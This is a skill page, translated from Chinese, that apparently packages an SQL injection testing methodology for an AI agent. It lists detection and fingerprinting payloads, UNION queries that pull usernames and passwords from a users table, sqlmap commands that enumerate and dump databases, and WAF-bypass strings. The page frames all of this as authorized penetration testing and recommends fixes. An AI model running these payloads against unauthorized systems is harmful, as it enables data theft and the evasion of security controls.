sql-injection-testing

Original：🇨🇳 Chinese

Translated

Professional Skills and Methodologies for SQL Injection Testing

1installs

Sourceed1s0nz/cyberstrikeai

Added on2026-02-07

NPX Install

npx skill4agent add ed1s0nz/cyberstrikeai sql-injection-testing

SKILL.md Content (Chinese)

View Translation Comparison →

SQL Injection Testing Skills

Overview

SQL injection is a common and dangerous web application vulnerability. This skill provides systematic SQL injection testing methods, detection techniques, and exploitation strategies.

Testing Methods

1. Parameter Identification

Identify all user input points: URL parameters, POST data, HTTP headers, Cookies, etc.
Focus on parameters such as id, search, filter, sort, etc.
Use Burp Suite or similar tools to intercept and modify requests

2. Basic Detection

Single quote test:
```
'
```
- Check if SQL errors occur
Boolean blind injection:
```
' AND '1'='1
```
vs
```
' AND '1'='2
```
Time-based blind injection:
```
' AND SLEEP(5)--
```
Union query:
```
' UNION SELECT NULL--
```

3. Database Identification

MySQL:
```
' AND @@version LIKE '%mysql%'--
```
PostgreSQL:
```
' AND version() LIKE '%PostgreSQL%'--
```
MSSQL:
```
' AND @@version LIKE '%Microsoft%'--
```

Oracle:

' AND (SELECT banner FROM v$version WHERE rownum=1) LIKE '%Oracle%'--

4. Information Extraction

Database name:
```
' UNION SELECT database()--
```

Table names:

' UNION SELECT table_name FROM information_schema.tables--

Column names:

' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

Data extraction:

' UNION SELECT username,password FROM users--

Tool Usage

sqlmap

bash

# 基础扫描
sqlmap -u "http://target.com/page?id=1"

# 指定参数
sqlmap -u "http://target.com/page" --data="id=1" --method=POST

# 指定数据库类型
sqlmap -u "http://target.com/page?id=1" --dbms=mysql

# 获取数据库列表
sqlmap -u "http://target.com/page?id=1" --dbs

# 获取表
sqlmap -u "http://target.com/page?id=1" -D database_name --tables

# 获取数据
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump

Manual Testing

Use Burp Suite's Repeater module
Use browser developer tools
Write Python scripts for automated testing

Bypass Techniques

WAF Bypass

Encoding bypass: URL encoding, Unicode encoding, hexadecimal encoding
Comment bypass:
```
/**/
```
,
```
--
```
,
```
#
```
Case mixing:
```
SeLeCt
```
,
```
UnIoN
```
Space replacement:
```
/**/
```
,
```
+
```
,
```
%09
```
(Tab),
```
%0A
```
(newline)

Examples

原始：' UNION SELECT NULL--
绕过1：'/**/UNION/**/SELECT/**/NULL--
绕过2：'%55nion%20select%20null--
绕过3：'/*!UNION*//*!SELECT*/null--

Verification and Reporting

Verification Steps

Confirm that SQL statements can be executed
Extract database information for verification
Assess the scope of impact (data leakage, privilege escalation, etc.)
Record complete POC (request/response)

Key Reporting Points

Vulnerability location and parameters
Affected data and systems
Complete exploitation steps
Fix recommendations (parameterized queries, input validation, etc.)

Notes

Only perform tests in authorized testing environments
Avoid causing damage to production data
Be cautious when using dangerous operations like DROP, DELETE, etc.
Record all test steps for reproducibility